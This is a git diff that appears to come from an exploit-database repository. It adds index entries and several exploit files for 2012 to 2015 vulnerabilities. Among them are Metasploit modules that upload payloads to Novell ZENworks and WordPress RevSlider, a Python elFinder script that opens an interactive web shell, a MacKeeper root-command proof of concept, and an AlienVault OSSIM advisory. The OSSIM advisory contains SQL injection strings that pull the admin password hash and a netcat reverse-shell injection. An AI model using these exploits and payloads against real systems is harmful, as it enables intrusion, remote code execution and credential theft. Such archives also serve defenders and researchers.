diff --git a/files.csv b/files.csv index 963a1ae16..191aeb594 100755 --- a/files.csv +++ b/files.csv @@ -33311,6 +33311,14 @@ id,file,description,date,author,platform,type,port 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 +36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross Site Scripting and SQL Injection Vulnerabilities",2012-03-13,sonyy,php,webapps,0 +36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 Arbitrary File Deletion Vulnerability",2012-03-13,"Ryan Lortie",linux,local,0 +36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 'id' Parameter Local File Include Vulnerability",2012-03-14,n0tch,php,webapps,0 +36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service Vulnerability",2012-03-15,Rune,windows,dos,0 +36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection Vulnerability",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 +36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0 +36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation) Vulnerability",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0 @@ -33329,3 +33337,23 @@ id,file,description,date,author,platform,type,port 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0 +36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0 +36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0 +36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 +36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 +36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 Advanced Search Multiple Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 +36949,platforms/php/webapps/36949.txt,"Xeams <= 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 +36950,platforms/php/webapps/36950.txt,"Syncrify Server <= 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 +36951,platforms/php/webapps/36951.txt,"SynaMan <= 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 +36953,platforms/php/webapps/36953.txt,"SynTail <= 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 +36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin <= 4.2.4 - CSRF Vulnerability",2015-05-08,Evex,php,webapps,80 +36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 +36956,platforms/windows/remote/36956.rb,"Adobe Flash Player domainMemory ByteArray Use After Free",2015-05-08,metasploit,windows,remote,0 +36957,platforms/php/remote/36957.rb,"Wordpress RevSlider File Upload and Execute Vulnerability",2015-05-08,metasploit,php,remote,80 +36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - CSRF Vulnerability",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - CSRF Vulnerability",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - CSRF Vulnerability",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 +36961,platforms/php/webapps/36961.txt,"Wordpress Ad Inserter Plugin 1.5.2 - CSRF Vulnerability",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36962,platforms/windows/remote/36962.rb,"Adobe Flash Player NetConnection Type Confusion",2015-05-08,metasploit,windows,remote,0 +36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14_ 4.15_ and 5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 +36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management Arbitrary File Upload",2015-05-08,metasploit,java,remote,443 diff --git a/platforms/hardware/remote/36945.txt b/platforms/hardware/remote/36945.txt new file mode 100755 index 000000000..6b0475f36 --- /dev/null +++ b/platforms/hardware/remote/36945.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/52424/info + +TP-LINK TL-WR740N is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or script code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. + +TP-LINK TL-WR740N 111130 is vulnerable; other versions may also be affected. + +1. Go to http://www.example.com/maintenance/tools_test.htm +2. make ping like </textarea> diff --git a/platforms/ios/webapps/36924.txt b/platforms/ios/webapps/36924.txt new file mode 100755 index 000000000..a7538aeab --- /dev/null +++ b/platforms/ios/webapps/36924.txt @@ -0,0 +1,190 @@ +Document Title: +=============== +PDF Converter & Editor 2.1 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1480 + + +Release Date: +============= +2015-05-06 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1480 + + +Common Vulnerability Scoring System: +==================================== +6.9 + + +Product & Service Introduction: +=============================== +Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. +It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save +it on your iPhone, iPod Touch or iPad locally. + +(Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-06: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +AppzCreative Ltd +Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands +to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious +`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in +the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` +in connection with the vulnerable file upload POST method request. + +Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious +attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Submit (Upload) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:52437/) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Install the software to your iOS device +2. Start the mobile ios software and activate the web-server +3. Open the wifi interface for file transfers +4. Start a session tamper and upload a random fil +5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) +6. Save the input by processing to continue the request +7. The code executes in the main file dir index list of the local web-server (localhost:52437) +8. Open the link with the private folder and attach the file for successful exploitation with the path value +9. Successful reproduce of the vulnerability! + + +PoC: Upload File (http://localhost:52437/Box/) +
Files

..
+<../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png ( 0.5 Kb, 2015-04-30 10:58:46 +0000)
+

+ +--- PoC Session Logs [POST] (LFI - Filename) --- +Status: 200[OK] +POST http://localhost:52437/Box/ +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:52437] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:52437/Box/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------321711425710317 +Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" +Content-Type: image/png + +Reference(s): +http://localhost:52437/ +http://localhost:52437/Box/ + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and +disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. +Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. + + +Security Risk: +============== +The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/java/remote/36964.rb b/platforms/java/remote/36964.rb new file mode 100755 index 000000000..b79f93571 --- /dev/null +++ b/platforms/java/remote/36964.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in Novell ZENworks Configuration + Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in + the UploadServlet which accepts unauthenticated file uploads and does not check the + "uid" parameter for directory traversal characters. This allows an attacker to write + anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat + webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. + This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note + that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a + Metasploit exploit, but it abuses a different parameter of the same servlet. + }, + 'Author' => + [ + 'Pedro Ribeiro ', # Vulnerability Discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0779'], + ['OSVDB', '120382'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] + ], + 'DefaultOptions' => { 'WfsDelay' => 30 }, + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 7 2015')) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', + [true, 'Use SSL', true]), + OptString.new('TARGETURI', + [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), + OptString.new('TOMCAT_PATH', + [false, 'The Tomcat webapps traversal path (from the temp directory)']) + ], self.class) + end + + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), + 'method' => 'GET' + }) + + if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + + def upload_war_and_exec(tomcat_path) + app_base = rand_text_alphanumeric(4 + rand(32 - 4)) + war_payload = payload.encoded_war({ :app_name => app_base }).to_s + + print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), + 'method' => 'POST', + 'data' => war_payload, + 'ctype' => 'application/octet-stream', + 'vars_get' => { + 'uid' => tomcat_path, + 'filename' => "#{app_base}.war" + } + }) + if res && res.code == 200 + print_status("#{peer} - Upload appears to have been successful") + else + print_error("#{peer} - Failed to upload, try again with a different path?") + return false + end + + 10.times do + Rex.sleep(2) + + # Now make a request to trigger the newly deployed war + print_status("#{peer} - Attempting to launch payload in deployed WAR...") + send_request_cgi({ + 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET' + }) + + # Failure. The request timed out or the server went away. + break if res.nil? + # Failure. Unexpected answer + break if res.code != 200 + # Unless session... keep looping + return true if session_created? + end + + false + end + + + def exploit + tomcat_paths = [] + if datastore['TOMCAT_PATH'] + tomcat_paths << datastore['TOMCAT_PATH'] + end + tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) + + tomcat_paths.each do |tomcat_path| + break if upload_war_and_exec(tomcat_path) + end + end +end \ No newline at end of file diff --git a/platforms/linux/local/36966.txt b/platforms/linux/local/36966.txt new file mode 100755 index 000000000..71b812855 --- /dev/null +++ b/platforms/linux/local/36966.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/52452/info + +Light Display Manager (LightDM) is prone to a local arbitrary-file-deletion vulnerability. + +A local attacker can exploit this issue to delete arbitrary files with administrator privileges. + +Light Display Manager (LightDM) 1.0.6 is vulnerable. Other versions may also be affected. + +/usr/sbin/guest-account has this cleanup: + +# remove leftovers in /tmp +find /tmp -mindepth 1 -maxdepth 1 -uid "$UID" | xargs rm -rf || true + +This runs with the cwd of the last logged in user. If the user creates a file "/tmp/x a", the file "a" gets removed from the last user's login. \ No newline at end of file diff --git a/platforms/linux/webapps/36963.txt b/platforms/linux/webapps/36963.txt new file mode 100755 index 000000000..4e7b3db20 --- /dev/null +++ b/platforms/linux/webapps/36963.txt @@ -0,0 +1,109 @@ +Details +======= + +Product: Alienvault OSSIM/USM +Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution) +Author: Peter Lapp, lappsec@gmail.com +CVE: None assigned +Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects +all previous versions as well. +Fixed Version: No fix has been released. + + +Summary +======= + +Alienvault OSSIM is an open source SIEM solution designed to collect +and correlate log data. The vulnerability management section of the UI +allows a user to upload a Nessus scan in NBE format. Using a specially +crafted NBE file, a user can exploit multiple vulnerabilities such as +XSS, SQLi, and Command Execution. Authentication is required to +exploit this vulnerability, but admin privileges are not required. Any +user with access to the Vulnerabilities page can perform these +attacks. + +The vendor was notified almost 5 months ago about this vulnerability. +Given that they have not responded to my recent requests for updates +and just released a major version that did not patch these issues, I +have decided to release the details. + + +Technical Details +================= + +Various fields within the NBE file can be manipulated to exploit +certain vulnerabilities. A pretty bare template that I used to test +these issues looked something like this: + +timestamps|||scan_start|Thu Dec 11 17:00:51 2014| +timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014| +results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis +:\n\nThe remote host contains a web browser that is affected by +multiple vulnerabilities.\nOther references : +OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n +timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014| +timestamps|||scan_end|Thu Dec 11 17:16:44 2014| + + +Reflective XSS +-------------- +The hostname/IP portion of the NBE import is vulnerable. Putting + directly after the hostname/IP in the NBE +will result in the javascript being reflected back when the import +finishes. + +Stored XSS +---------- +The plugin ID portion of the NBE is vulnerable. +Adding to the plugin ID in the +NBE will result in the script being executed every time someone views +the HTML report in the OSSIM interface. + +Blind SQL Injection +------------------- +The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT +SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for +20 seconds. + +SQL Injection +------------- +The protocol portion of the NBE is vulnerable to SQL injection. +Take this: +cifs (445/tcp) +And turn it to this: +cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login="admin"),'N');# +(445/tcp) + +That will result in the hash of the admin password being included in +the report. The extra '(' in '1(' is required for the ending ) in +order to not cause an error in the Perl script that runs the import. + +Command Injection +----------------- +The hostname/IP portion of the NBE is vulnerable. Adding '#&&nc -c +/bin/sh 10.10.10.10 4444&&' will result in a reverse shell as www-data +to 10.10.10.10. +The initial # is required to comment out the remainder of a SQL query +that comes before the dig command where this is injected. Without it +the script won't proceed to the required point. + + +Solution +======== + +There's no official patch for this yet. It is possible to restrict +access to the Vulnerabilities page via user roles, which should +prevent a user from exploiting this. Also, if you're not using the +import feature, you could rename the Perl script on the file system +that runs the import. + + +Timeline +======== +01/12/2015 - Notified the vendor of the vulnerabilities. +01/12/2015 - Vendor confirms the issue and files a defect. +01/28/2015 - Requested an update from the vendor and was told the +issue would be worked on in the future. +04/20/2015 - Requested an update and informed the vendor of my intent +to release the details. No response. +05/05/2015 - Released details to FD. diff --git a/platforms/osx/remote/36955.py b/platforms/osx/remote/36955.py new file mode 100755 index 000000000..5f5a3a50d --- /dev/null +++ b/platforms/osx/remote/36955.py @@ -0,0 +1,32 @@ +#!/usr/bin/python +""" +SecureMac has released an advisory on a vulnerability discovered today with MacKeeper. The advisory titled MacKeeper URL handler remote code execution vulnerability and proof-of-concept (Zero-Day) contains the latest information including vulnerability, proof of concept and workaround solution, this report will be updated with the latest information: http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php + +Security Advisory: MacKeeper URL handler remote code execution vulnerability and proof-of-concept (Zero-Day) Date issued: 05/07/2015 + +Risk: Critical (for users running MacKeeper) + +A vulnerability has been discovered in MacKeeper, a utility program for OS X. MacKeeper was originally created by Ukrainian company ZeoBIT and is now distributed by Kromtech Alliance Corp. A flaw exists in MacKeeper's URL handler implementation that allows arbitrary remote code execution when a user visits a specially crafted webpage. + +Security researcher Braden Thomas has discovered a serious flaw in the way MacKeeper handles custom URLs that allows arbitrary commands to be run as root with little to no user interaction required. Mr. Thomas released a proof-of-concept (POC) demonstrating how visiting a specially crafted webpage in Safari causes the affected system to execute arbitrary commands – in this case, to uninstall MacKeeper. This flaw appears to be caused by a lack of input validation by MacKeeper when executing commands using its custom URL scheme. + +If MacKeeper has already prompted the user for their password during the normal course of the program's operation, the user will not be prompted for their password prior to the arbitrary command being executed as root. If the user hasn't previously authenticated, they will be prompted to enter their username and password – however, the text that appears for the authentication dialog can be manipulated as part of the exploit and set to anything, so the user might not realize the consequences of this action. At this time it is not known if Mr. Thomas reached out to MacKeeper prior to publication of the vulnerability, but this is likely a zero-day exploit. + +Apple allows OS X and iOS apps to define custom URL schemes and register them with the operating system so that other programs know which app should handle the custom URL scheme. Normally, this is used to define a custom communication protocol for sending data or performing a specific action (for example, clicking a telephone number link in iOS will ask if the user wants to dial that number, or clicking an e-mail address link in OS X will open Mail.app and compose a new message to that person). Apple's inter-application programming guide explicitly tells developers to validate the input received from these custom URLs in order to avoid problems related to URL handling. Additionally, Apple has provided information on the importance of input validation in their Secure Coding Guide . + +Since this is a zero-day vulnerability that exists even in the latest version of MacKeeper (MacKeeper 3.4), it could affect an extremely large number of users, as a recent MacKeeper press release boasts that it has surpassed 20 million downloads worldwide . MacKeeper is a controversial program in the Mac community, with many users voicing complaints about the numerous popups and advertisements they have encountered for MacKeeper. While the POC released by Mr. Thomas is relatively benign, the source code provided with the POC is in the wild and could easily be modified to perform malicious attacks on affected systems. + +Workaround/Fix: Until MacKeeper fixes this vulnerability in their program, users can do a few different things to mitigate this threat. On OS X, clicking a link in Safari that uses a custom URL scheme will automatically open the program that is registered to handle that type of URL. Other browsers, such as Google's Chrome browser, will ask the user for permission before opening a link that uses an external protocol. Non-technical users could use a web browser other than Safari, in order to see an alert before a link could cause an arbitrary command to be executed. More technically-inclined users could remove the custom URL scheme handler from MacKeeper's Info.plist file. + +Proof-of-concept: https://twitter.com/drspringfield/status/596316000385167361 +This is an initial advisory and will be updated at http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php as more information becomes available. +""" + +import sys,base64 +from Foundation import * +RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper" +d = NSMutableData.data() +a = NSArchiver.alloc().initForWritingWithMutableData_(d) +a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask")) +a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None)) +print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d) diff --git a/platforms/php/remote/36957.rb b/platforms/php/remote/36957.rb new file mode 100755 index 000000000..8b26ce8e3 --- /dev/null +++ b/platforms/php/remote/36957.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', + 'Description' => %q{ + This module exploits an arbitrary PHP code upload in the WordPress ThemePunch + Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The + vulnerability allows for arbitrary file upload and remote code execution. + }, + 'Author' => + [ + 'Simo Ben youssef', # Vulnerability discovery + 'Tom Sellers ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], + ['EDB', '35385'], + ['WPVDB', '7954'], + ['OSVDB', '115118'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], + 'DisclosureDate' => 'Nov 26 2015', + 'DefaultTarget' => 0) + ) + end + + def check + release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') + check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') + end + + def exploit + php_pagename = rand_text_alpha(4 + rand(4)) + '.php' + + # Build the zip + payload_zip = Rex::Zip::Archive.new + # If the filename in the zip is revslider.php it will be automatically + # executed but it will break the plugin and sometimes WordPress + payload_zip.add_file('revslider/' + php_pagename, payload.encoded) + + # Build the POST body + data = Rex::MIME::Message.new + data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') + data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') + data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") + post_data = data.to_s + + res = send_request_cgi( + 'uri' => wordpress_url_admin_ajax, + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + ) + + if res + if res.code == 200 && res.body =~ /Update in progress/ + # The payload itself almost never deleted, try anyway + register_files_for_cleanup(php_pagename) + # This normally works + register_files_for_cleanup('../revslider.zip') + final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) + print_good("#{peer} - Our payload is at: #{final_uri}") + print_status("#{peer} - Calling payload...") + send_request_cgi( + 'uri' => normalize_uri(final_uri), + 'timeout' => 5 + ) + elsif res.code == 200 && res.body =~ /^0$/ + # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown + fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") + end + else + fail_with(Failure::Unknown, 'ERROR') + end + + end +end diff --git a/platforms/php/webapps/36925.py b/platforms/php/webapps/36925.py new file mode 100755 index 000000000..86af04802 --- /dev/null +++ b/platforms/php/webapps/36925.py @@ -0,0 +1,60 @@ +#[+] Author: TUNISIAN CYBER +#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability +#[+] Date: 06-05-2015 +#[+] Vendor: https://github.com/Studio-42/elFinder +#[+] Type: WebAPP +#[+] Tested on: KaliLinux (Debian) +#[+] Twitter: @TCYB3R +#[+] Time Line: +# 03-05-2015:Vulnerability Discovered +# 03-05-2015:Contacted Vendor +# 04-05-2015:No response +# 05-05-2015:No response +# 06-05-2015:No response +# 06-05-2015:Vulnerability published + +import cookielib, urllib +import urllib2 +import sys + +print"\x20\x20+-------------------------------------------------+" +print"\x20\x20| elFinder Remote Command Execution Vulnerability |" +print"\x20\x20| TUNISIAN CYBER |" +print"\x20\x20+-------------------------------------------------+" + + +host = raw_input('\x20\x20Vulnerable Site:') +evilfile = raw_input('\x20\x20EvilFileName:') +path=raw_input('\x20\x20elFinder s Path:') + + +tcyber = cookielib.CookieJar() +opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber)) + +create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw') +#print create.read() + +payload = urllib.urlencode({ + 'cmd' : 'put', + 'target' : 'l1_'+evilfile.encode('base64','strict'), + 'content' : '' + }) + +write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload) +#print write.read() +print '\n' +while True: + try: + cmd = raw_input('[She3LL]:~# ') + + execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd)) + reverse = execute.read() + print reverse; + + if cmd.strip() == 'exit': + break + + except Exception: + break + +sys.exit() \ No newline at end of file diff --git a/platforms/php/webapps/36944.txt b/platforms/php/webapps/36944.txt new file mode 100755 index 000000000..68fdd5ada --- /dev/null +++ b/platforms/php/webapps/36944.txt @@ 